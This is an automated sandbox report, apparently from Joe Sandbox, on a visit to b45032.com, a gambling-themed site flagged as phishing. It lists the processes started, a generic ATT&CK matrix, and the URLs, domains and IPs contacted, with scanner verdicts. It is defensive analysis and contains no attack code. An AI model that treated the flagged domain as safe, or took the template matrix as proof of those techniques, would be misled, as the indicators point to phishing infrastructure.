Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2320,i,16585267306971853294,6447281845026543591,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://b45032.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2320,i,16585267306971853294,6447281845026543591,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://b45032.com/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://5getfab.segrft.com/plus/js/custom/login_custom.js?ver=16067901050%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/gdrbc1kqj7gr4.png?ver=17318980480%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/173_egame_logo.png?ver=16988297790%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/76_egame_logo.png?ver=16067901100%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_treasureHeroes.png?ver=17121286010%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/main/favicon.ico?ver=16067901070%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/221_egame_logo.png?ver=16067901100%Avira URL Cloudsafe
https://5getfab.segrft.com/images/dc_hot.gif?ver=16067900760%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/other/banner2.jpg?ver=16068916980%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/footer/footer-GamCare.png?ver=16067901070%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/xkbfobaryz7xs.png?ver=17318980480%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/196_egame_logo.png?ver=16735786600%Avira URL Cloudsafe
https://5getfab.segrft.com/plugins/jquery-ui/jquery-ui.min.css?ver=16067901050%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/js/unite/encforms.js?ver=17235448580%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/en/202_egame_icon.png?17367257189630%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/sky/sw_dhcf.png?ver=16911419660%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/index/g04.jpg?ver=16067933750%Avira URL Cloudsafe
https://5getfab.segrft.com/plugins/jquery-ui/images/ui-icons_555555_256x240.png0%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/css/unite/prizedraw_pop_unite.css?ver=17338839880%Avira URL Cloudsafe
https://b45032.com/images_plus/other/en/right3.jpg100%Avira URL Cloudphishing
https://5getfab.segrft.com/common/storage/game/egame/joker/z7k6mqf3z495a.png?ver=16733345910%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_seven7s.png?ver=17121286010%Avira URL Cloudsafe
https://5getfab.segrft.com/js/www/login.js?ver=16067900760%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=16855931310%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/other/en/p-img1.png0%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/en/224_egame_icon.png?17367256973440%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_TreasureBowls.png?ver=17283551700%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/159_egame_logo.png?ver=17139312610%Avira URL Cloudsafe
https://b45032.com/gdcode_1736725694100%Avira URL Cloudphishing
https://5getfab.segrft.com/plus/plugin/js/swiper.min.js?ver=16067901050%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/plugin/js/jquery.min.js?ver=16067901050%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/ue8mt39rhzpps.png?ver=16733345910%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/yoplay/YP801.png?ver=16643562260%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/217_egame_logo.png?ver=16922090120%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/js/unite/jsencrypt.min.js?ver=16067901050%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/header/common/spiler.png0%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/o39k3h9o685xq.png?ver=17333691940%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/187_egame_logo.png?ver=16883550770%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/css/custom/egame_custom.css?ver=17363928660%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_FaFaFortune.png?ver=17283551700%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/mg/SMG_sharkPlatinum.png?ver=17205763060%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/136_egame_logo.png?ver=16067901100%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_tikiMania.png?ver=17121286010%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/mur8wje4dccb1.png?ver=16733345900%Avira URL Cloudsafe
https://5getfab.segrft.com/plugins/jquery-ui/images/ui-icons_777777_256x240.png0%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/ww3a8wsu4de7c.png?ver=16733345910%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_risingRoyals.png?ver=17121286010%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/js/custom/main.js?ver=16067901050%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/202_egame_icon.png?17367257189630%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/cms/cms_1051.png?ver=16117541840%Avira URL Cloudsafe
https://b45032.com/common/storage/cms/cms_1045.png?v=1611754636100%Avira URL Cloudphishing
https://5getfab.segrft.com/common/storage/game/egame/joker/zhh6mqf3z495a.png?ver=17346813270%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/index/sec-nav-bg-grad.gif0%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/plugin/css/sweetalert.css?ver=16067901050%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/common/search.png0%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/other/banner4.jpg?ver=16068916990%Avira URL Cloudsafe
https://b45032.com/images_plus/other/en/right2.jpg100%Avira URL Cloudphishing
https://5getfab.segrft.com/assets/js/caller.js?ver=16754182570%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/footer/footer_spiler.png0%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/j9nzkkbjfaz1a.png?ver=16733345900%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/89_egame_logo.png?ver=16998474250%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/cz3wgrounyetc.png?ver=16733345900%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/css/custom/float_customer.css?ver=16069889180%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/fcg/21003.png?ver=16596837080%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/css/unite/login_unite.css?ver=16146802400%Avira URL Cloudsafe
http://tongji.baidu.com/hm-web/welcome/ico0%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/197_egame_logo.png?ver=16735786190%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/tocki7xk7xwq1.png?ver=16733345910%Avira URL Cloudsafe
https://b45032.com/getcatlist/224100%Avira URL Cloudphishing
https://5getfab.segrft.com/common/storage/game/egame/joker/fmjyoi4wkifrs.png?ver=17278449150%Avira URL Cloudsafe
https://b45032.com/getegame?platform%5B%5D=202&page=1&gamename=&gameid=100%Avira URL Cloudphishing
https://5getfab.segrft.com/images/dc_new.gif?ver=16067900760%Avira URL Cloudsafe
https://b45032.com/getegame?platform%5B%5D=224&page=1&gamename=&gameid=100%Avira URL Cloudphishing
https://5getfab.segrft.com/images_plus/footer/footer-gt.png?ver=16067901070%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/joker/3yfmucpss64mk.png?ver=16733345900%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/59_egame_logo.png?ver=16067901100%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/cms/cms_1052.jpg?ver=16117547970%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_stumpyMcDoodles.png?ver=17121286010%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/172_egame_logo.png?ver=16691926580%Avira URL Cloudsafe
https://5getfab.segrft.com/common/storage/game/egame/jdb/9020.png?ver=17157401520%Avira URL Cloudsafe
https://5getfab.segrft.com/plus/js/custom/moment-timezone.js?ver=16067901050%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/egame/nav/224_egame_icon.png?17367256973440%Avira URL Cloudsafe
https://5getfab.segrft.com/images_plus/footer/footer-18plus.png?ver=16067901070%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    azcloud.g.tuf3a353.com
    20.255.122.93
    truefalse
      unknown
      b45032.com
      154.86.18.4
      truetrue
        unknown
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          www.google.com
          142.250.185.100
          truefalse
            high
            hm.e.shifen.com
            111.45.3.198
            truefalse
              high
              fp2e7a.wpc.phicdn.net
              192.229.221.95
              truefalse
                high
                5getfab.segrft.com
                unknown
                unknowntrue
                  unknown
                  hm.baidu.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://5getfab.segrft.com/images_plus/main/favicon.ico?ver=1606790107false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/images_plus/egame/nav/76_egame_logo.png?ver=1606790110false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/images_plus/egame/nav/173_egame_logo.png?ver=1698829779false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/images/dc_hot.gif?ver=1606790076false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/images_plus/footer/footer-GamCare.png?ver=1606790107false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/images_plus/egame/nav/221_egame_logo.png?ver=1606790110false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_treasureHeroes.png?ver=1712128601false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/common/storage/game/egame/joker/gdrbc1kqj7gr4.png?ver=1731898048false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/images_plus/other/banner2.jpg?ver=1606891698false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/plus/js/custom/login_custom.js?ver=1606790105false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/plugins/jquery-ui/jquery-ui.min.css?ver=1606790105false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/plus/js/unite/encforms.js?ver=1723544858false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/images_plus/egame/nav/196_egame_logo.png?ver=1673578660false
                    • Avira URL Cloud: safe
                    unknown
                    https://5getfab.segrft.com/common/storage/game/egame/joker/xkbfobaryz7xs.png?ver=1731898048false
                    • Avira URL Cloud: safe
                    unknown
                    https://b45032.com/images_plus/other/en/right3.jpgtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://hm.baidu.com/hm.js?947ea0365dd8ab01fc51bd9439b42930false
                      high
                      https://5getfab.segrft.com/plugins/jquery-ui/images/ui-icons_555555_256x240.pngfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/plus/css/unite/prizedraw_pop_unite.css?ver=1733883988false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/images_plus/index/g04.jpg?ver=1606793375false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/common/storage/game/egame/sky/sw_dhcf.png?ver=1691141966false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/images_plus/egame/nav/en/202_egame_icon.png?1736725718963false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/js/www/login.js?ver=1606790076false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=1685593131false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_seven7s.png?ver=1712128601false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/common/storage/game/egame/joker/z7k6mqf3z495a.png?ver=1673334591false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/images_plus/egame/nav/159_egame_logo.png?ver=1713931261false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_TreasureBowls.png?ver=1728355170false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/images_plus/egame/nav/en/224_egame_icon.png?1736725697344false
                      • Avira URL Cloud: safe
                      unknown
                      https://5getfab.segrft.com/images_plus/other/en/p-img1.pngfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b45032.com/true
                        unknown
                        https://5getfab.segrft.com/plus/plugin/js/swiper.min.js?ver=1606790105false
                        • Avira URL Cloud: safe
                        unknown
                        https://b45032.com/gdcode_1736725694true
                        • Avira URL Cloud: phishing
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/joker/ue8mt39rhzpps.png?ver=1673334591false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/yoplay/YP801.png?ver=1664356226false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/plus/plugin/js/jquery.min.js?ver=1606790105false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/plus/js/unite/jsencrypt.min.js?ver=1606790105false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/images_plus/egame/nav/217_egame_logo.png?ver=1692209012false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/plus/css/custom/egame_custom.css?ver=1736392866false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/images_plus/egame/nav/187_egame_logo.png?ver=1688355077false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_FaFaFortune.png?ver=1728355170false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/images_plus/header/common/spiler.pngfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/joker/o39k3h9o685xq.png?ver=1733369194false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/images_plus/egame/nav/136_egame_logo.png?ver=1606790110false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_risingRoyals.png?ver=1712128601false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_tikiMania.png?ver=1712128601false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/mg/SMG_sharkPlatinum.png?ver=1720576306false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/plugins/jquery-ui/images/ui-icons_777777_256x240.pngfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/joker/mur8wje4dccb1.png?ver=1673334590false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/plus/js/custom/main.js?ver=1606790105false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/joker/ww3a8wsu4de7c.png?ver=1673334591false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/images_plus/egame/nav/202_egame_icon.png?1736725718963false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/common/storage/cms/cms_1051.png?ver=1611754184false
                        • Avira URL Cloud: safe
                        unknown
                        https://b45032.com/common/storage/cms/cms_1045.png?v=1611754636true
                        • Avira URL Cloud: phishing
                        unknown
                        https://5getfab.segrft.com/common/storage/game/egame/joker/zhh6mqf3z495a.png?ver=1734681327false
                        • Avira URL Cloud: safe
                        unknown
                        https://5getfab.segrft.com/plus/plugin/css/sweetalert.css?ver=1606790105false
                        • Avira URL Cloud: safe
                        unknown
                        https://b45032.com/#true
                          unknown
                          https://5getfab.segrft.com/images_plus/index/sec-nav-bg-grad.giffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://5getfab.segrft.com/images_plus/egame/common/search.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://5getfab.segrft.com/images_plus/other/banner4.jpg?ver=1606891699false
                          • Avira URL Cloud: safe
                          unknown
                          https://5getfab.segrft.com/common/storage/game/egame/joker/j9nzkkbjfaz1a.png?ver=1673334590false
                          • Avira URL Cloud: safe
                          unknown
                          https://b45032.com/images_plus/other/en/right2.jpgtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://5getfab.segrft.com/images_plus/footer/footer_spiler.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://5getfab.segrft.com/assets/js/caller.js?ver=1675418257false
                          • Avira URL Cloud: safe
                          unknown
                          https://b45032.com/egame/202true
                            unknown
                            https://5getfab.segrft.com/images_plus/egame/nav/89_egame_logo.png?ver=1699847425false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/common/storage/game/egame/joker/cz3wgrounyetc.png?ver=1673334590false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/plus/css/custom/float_customer.css?ver=1606988918false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/common/storage/game/egame/fcg/21003.png?ver=1659683708false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/plus/css/unite/login_unite.css?ver=1614680240false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/images_plus/egame/nav/197_egame_logo.png?ver=1673578619false
                            • Avira URL Cloud: safe
                            unknown
                            https://b45032.com/getcatlist/224true
                            • Avira URL Cloud: phishing
                            unknown
                            https://5getfab.segrft.com/common/storage/game/egame/joker/tocki7xk7xwq1.png?ver=1673334591false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/common/storage/game/egame/joker/fmjyoi4wkifrs.png?ver=1727844915false
                            • Avira URL Cloud: safe
                            unknown
                            https://b45032.com/getegame?platform%5B%5D=202&page=1&gamename=&gameid=true
                            • Avira URL Cloud: phishing
                            unknown
                            https://5getfab.segrft.com/common/storage/game/egame/joker/3yfmucpss64mk.png?ver=1673334590false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/images_plus/footer/footer-gt.png?ver=1606790107false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/images/dc_new.gif?ver=1606790076false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/common/storage/cms/cms_1052.jpg?ver=1611754797false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/common/storage/game/egame/jdb/9020.png?ver=1715740152false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/images_plus/egame/nav/172_egame_logo.png?ver=1669192658false
                            • Avira URL Cloud: safe
                            unknown
                            https://b45032.com/getegame?platform%5B%5D=224&page=1&gamename=&gameid=true
                            • Avira URL Cloud: phishing
                            unknown
                            https://5getfab.segrft.com/images_plus/egame/nav/59_egame_logo.png?ver=1606790110false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_stumpyMcDoodles.png?ver=1712128601false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/plus/js/custom/moment-timezone.js?ver=1606790105false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/images_plus/egame/nav/224_egame_icon.png?1736725697344false
                            • Avira URL Cloud: safe
                            unknown
                            https://5getfab.segrft.com/images_plus/footer/footer-18plus.png?ver=1606790107false
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/moment/moment/issues/1423chromecache_270.2.dr, chromecache_334.2.drfalse
                              high
                              http://stackoverflow.com/questions/181348/instantiating-a-javascript-object-by-calling-prototype-conchromecache_270.2.dr, chromecache_334.2.drfalse
                                high
                                http://getbootstrap.com)chromecache_354.2.dr, chromecache_356.2.drfalse
                                  high
                                  http://momentjs.com/guides/#/warnings/zone/chromecache_270.2.dr, chromecache_334.2.drfalse
                                    high
                                    http://docs.closure-library.googlecode.com/git/closure_goog_date_date.js.source.htmlchromecache_270.2.dr, chromecache_334.2.drfalse
                                      high
                                      https://hmcdn.baidu.com/static/tongji/plugins/chromecache_226.2.drfalse
                                        high
                                        http://www.idangero.us/swiper/chromecache_266.2.dr, chromecache_307.2.drfalse
                                          high
                                          http://momentjs.com/timezone/docs/#/data-loading/.chromecache_422.2.dr, chromecache_431.2.drfalse
                                            high
                                            http://momentjs.com/guides/#/warnings/min-max/chromecache_334.2.drfalse
                                              high
                                              https://hmcdn.baidu.com/staticchromecache_226.2.drfalse
                                                high
                                                https://npmcdn.com/jsencryptchromecache_265.2.dr, chromecache_468.2.drfalse
                                                  high
                                                  http://tongji.baidu.com/hm-web/welcome/icochromecache_226.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://momentjs.com/guides/#/warnings/define-locale/chromecache_270.2.dr, chromecache_334.2.drfalse
                                                    high
                                                    https://goutong.baidu.com/site/chromecache_226.2.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      154.86.18.4
                                                      b45032.comSeychelles
                                                      40065CNSERVERSUStrue
                                                      111.45.3.198
                                                      hm.e.shifen.comChina
                                                      56040CMNET-GUANGDONG-APChinaMobilecommunicationscorporationfalse
                                                      142.250.185.100
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      20.255.122.93
                                                      azcloud.g.tuf3a353.comUnited States
                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      154.86.18.242
                                                      unknownSeychelles
                                                      40065CNSERVERSUSfalse
                                                      14.215.183.79
                                                      unknownChina
                                                      58466CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCNfalse
                                                      IP
                                                      192.168.2.4
                                                      192.168.2.6
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1589661
                                                      Start date and time:2025-01-13 00:46:33 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 4m 37s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:browseurl.jbs
                                                      Sample URL:https://b45032.com/
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:8
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal68.phis.win@18/499@18/9
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Browse: https://b45032.com/egame/224
                                                      • Browse: https://b45032.com/egame/202
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 74.125.133.84, 142.250.185.78, 142.250.185.99, 172.217.16.206, 142.250.185.142, 172.217.18.110, 52.149.20.212, 199.232.210.172, 192.229.221.95, 13.85.23.206, 142.250.181.238, 172.217.18.14, 216.58.206.74, 142.250.186.138, 142.250.181.234, 142.250.186.74, 172.217.18.106, 142.250.185.202, 142.250.186.170, 142.250.185.234, 142.250.186.42, 142.250.185.170, 216.58.206.42, 142.250.186.106, 142.250.184.202, 142.250.185.138, 216.58.212.170, 142.250.74.202, 20.242.39.171, 142.250.184.206, 142.250.186.78, 142.250.185.163, 34.104.35.123, 216.58.206.46, 142.250.186.174, 142.250.184.238, 2.23.242.162, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, ocsp.digicert.com, edgedl.me.gvt1.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                      • Report size getting too big, too many NtCreateFile calls found.
